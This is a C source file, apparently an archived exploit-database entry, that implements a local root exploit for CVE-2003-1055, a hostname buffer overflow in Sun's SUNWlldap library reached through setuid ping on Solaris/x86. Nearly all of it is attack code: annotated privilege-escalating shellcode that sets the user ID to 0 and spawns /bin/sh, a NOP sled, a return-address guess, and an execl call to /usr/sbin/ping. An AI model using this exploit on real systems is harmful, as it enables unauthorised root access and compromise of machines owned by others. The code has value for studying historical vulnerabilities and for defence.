
Sun SUNWlldap Library Hostname - Local Buffer Overflow - CVE-2003-1055

  1. /***********************************************************
  2. * hoagie_solarisldap.c
  3. *
  4. * gcc hoagie_solarisldap.c -o hoagie_solarisldap
  5. *
  6. * Author: Andi <andi@void.at>
  7. *
  8. * Greetz to Greuff, philipp and the other hoagie-fellas :-)
  9. *
  10. * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
  11. * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
  12. * DAMAGE DONE USING THIS PROGRAM.
  13. *
  14. *
* Offset: 9208 (default; measured on a system without Sun patch 108994-11).
* A different decimal offset can be passed as argv[1].
  16. *
  17. ************************************************************/
  18.  
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
  20.  
#define NOP 0x90      /* x86 `nop`; buf is filled with it so a landing anywhere in the sled slides to the payload */
#define ORIGSIZE 258  /* index in buf from which the return-address pattern is written (see main) */
  23.  
/*
 * Solaris/x86 shellcode: seteuid(0), setuid(0), then execve("/bin/sh").
 *
 * Every system call goes through an lcall gate instruction (7 bytes:
 * 0x9a, 4-byte offset, 2-byte selector). The real encoding contains NUL
 * bytes, so both copies below are embedded with non-zero filler and are
 * patched in place at run time (the movb/movl stores into %esi-relative
 * slots) before they are executed. The call/pop pairs exist only to load
 * a code address into %esi. All jump/call displacements are hand-encoded,
 * so inserting or removing a single byte breaks the layout. The payload
 * must stay NUL-free because buf is handed to execl as a C string.
 */
char shellcode[]=
/* main: */
"\xeb\x0a" /* jmp initcall: skip over the gate stub below */

/* initlcall: syscall gate stub, patched before first use */
"\x9a\x01\x02\x03\x5c\x07\x04" /* lcall: bytes 1-4 are zeroed, the trailing 0x04 becomes 0x00 */
"\xc3" /* ret */

/* jmpz: */
"\xeb\x05" /* jmp setuidcode */

/* initcall: */
"\xe8\xf9\xff\xff\xff" /* call jmpz: pushes the address of setuidcode */

/* setuidcode: */
"\x5e" /* popl %esi: %esi = address of setuidcode */
"\x29\xc0" /* subl %eax, %eax: %eax = 0 */
"\x88\x46\xf7" /* movb %al, -9(%esi): zero the high selector byte of the stub */
"\x89\x46\xf2" /* movl %eax, -14(%esi): zero the 4-byte offset of the stub */

/* seteuid(0); */
"\x50" /* pushl %eax: uid argument 0 */
"\xb0\x8d" /* movb $0x8d, %al: syscall number */
"\xe8\xe0\xff\xff\xff" /* call initlcall */
/* setuid(0); */
"\x29\xc0" /* subl %eax, %eax */
"\x50" /* pushl %eax: uid argument 0 */
"\xb0\x17" /* movb $0x17, %al: syscall number */
"\xe8\xd6\xff\xff\xff" /* call initlcall */

"\xeb\x1f" /* jmp callz */

/* start: the %esi-relative offsets below index the data block after callz */
/* execve /bin/sh */
"\x5e" /* popl %esi: %esi = address of "/bin/sh" */
"\x8d\x1e" /* leal (%esi), %ebx: %ebx = path */
"\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi): argv[0] = path */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x19" /* movb %al, 0x19(%esi): zero the last selector byte of the second gate */
"\x89\x46\x14" /* movl %eax, 0x14(%esi): zero its 4-byte offset */
"\x89\x46\x0f" /* movl %eax, 0x0f(%esi): argv[1] = NULL */
"\x89\x46\x07" /* movl %eax, 0x07(%esi): NUL-terminate "/bin/sh" */
"\xb0\x3b" /* movb $0x3b, %al: syscall number */
"\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx: %ecx = argv */
"\x51" /* pushl %ecx: envp (same array as argv) */
"\x51" /* pushl %ecx: argv */
"\x53" /* pushl %ebx: path */
"\x50" /* pushl %eax: presumably the dummy return-address word the gate convention expects before the arguments */
"\xeb\x18" /* jmp lcall */

/* callz: */
"\xe8\xdc\xff\xff\xff" /* call start: pushes the address of the data block below */

"\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh (offsets 0-6; offset 7 is zeroed at run time) */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03" /* offsets 7-18: terminator pad, argv[0] slot (11-14), argv[1] slot (15-18) */

/* lcall: second gate stub, offsets 19-25, patched before use */
"\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */
  82.  
  83.  
  84.  
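/*
 * Return the current stack pointer (x86; 32-bit %esp on the ILP32 target).
 *
 * Used only to seed the return-address guess in main. The original wrote
 * %esp into %eax and then fell off the end of a non-void function, relying
 * on %eax still holding the value at the return — undefined behaviour that
 * an optimising compiler may silently break. The asm now has an explicit
 * output operand and the value is returned normally; `volatile` keeps the
 * statement from being hoisted or dropped.
 */
unsigned long getsp(void)
{
    unsigned int sp;
    __asm__ volatile("movl %%esp, %0" : "=r"(sp));
    return sp;
}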
  89.  
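/*
 * Build the oversized hostname argument and exec the setuid target.
 *
 * Per the page title the overflow is in the SUNWlldap name-service library
 * reached through ping(1M) (CVE-2003-1055); this program only assembles
 * the argument. Layout of buf (512 bytes, NOP-filled):
 *   [0..]       NOP sled
 *   [28,29]     short jmp +30, landing on the shellcode at [60]
 *   [60..]      shellcode (108 bytes as shipped; must end before ORIGSIZE)
 *   [258..357]  guessed return address repeated 25 times; the bytes are
 *               written rotated by two so that an aligned little-endian
 *               copy of the address starts at ORIGSIZE+2
 *
 * argv[1], if given, overrides the decimal stack offset subtracted from
 * getsp() to form the return-address guess.
 *
 * Returns 1 on a bad offset, an oversized shellcode, or a failed exec
 * (the original fell off the end of main when execl failed); on success
 * execl does not return.
 *
 * Fixes relative to the original: buf was never NUL-terminated, so execl's
 * strlen read past the 512-byte array; sscanf's result was ignored; the
 * execl terminator was an uncast NULL; retaddr was an int holding an address.
 */
int main(int argc, char **argv) {
    char buf[512];
    long offset = 9208;
    unsigned long retaddr;
    size_t sclen;
    int i;

    if (argc > 1) {
        char *end;
        errno = 0;
        offset = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "bad offset: %s\n", argv[1]);
            return 1;
        }
    }

    printf("hoagie_solarisldap local root exploit\n");
    printf("[*] offset: 0x%lx\n", (unsigned long)offset);

    memset(buf, NOP, sizeof buf);
    buf[sizeof buf - 1] = '\0';   /* terminate: buf is passed to execl as a string */

    /* jmp +30 at [28]: 28 + 2 + 30 = 60, the first byte of the shellcode */
    buf[28] = (char)0xeb;
    buf[29] = 30;

    sclen = strlen(shellcode);
    if (60 + sclen > ORIGSIZE) {
        fprintf(stderr, "shellcode too long (%lu bytes)\n", (unsigned long)sclen);
        return 1;
    }
    memcpy(buf + 60, shellcode, sclen);

    retaddr = getsp() - (unsigned long)offset;
    printf("[*] return address: 0x%lx\n", retaddr);

    /*
     * 25 copies of the address, each 4 bytes, rotated by two: bytes 2,3 go
     * at ORIGSIZE+i, bytes 0,1 at ORIGSIZE+i+2, so from ORIGSIZE+2 onward
     * the buffer reads b0 b1 b2 b3 b0 b1 ... Highest index written is
     * ORIGSIZE + 96 + 3 = 357, inside the 511-byte string.
     */
    for (i = 0; i < 4 * 25; i += 4) {
        buf[i + ORIGSIZE + 2] = (char)(retaddr & 0xff);
        buf[i + ORIGSIZE + 3] = (char)((retaddr >> 8) & 0xff);
        buf[i + ORIGSIZE + 0] = (char)((retaddr >> 16) & 0xff);
        buf[i + ORIGSIZE + 1] = (char)((retaddr >> 24) & 0xff);
    }

    execl("/usr/sbin/ping", "ping", buf, (char *)NULL);
    perror("execl");   /* only reached if the exec failed */
    return 1;
}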
  122.  
  123.  
  124. // milw0rm.com [2003-04-01]
  125.            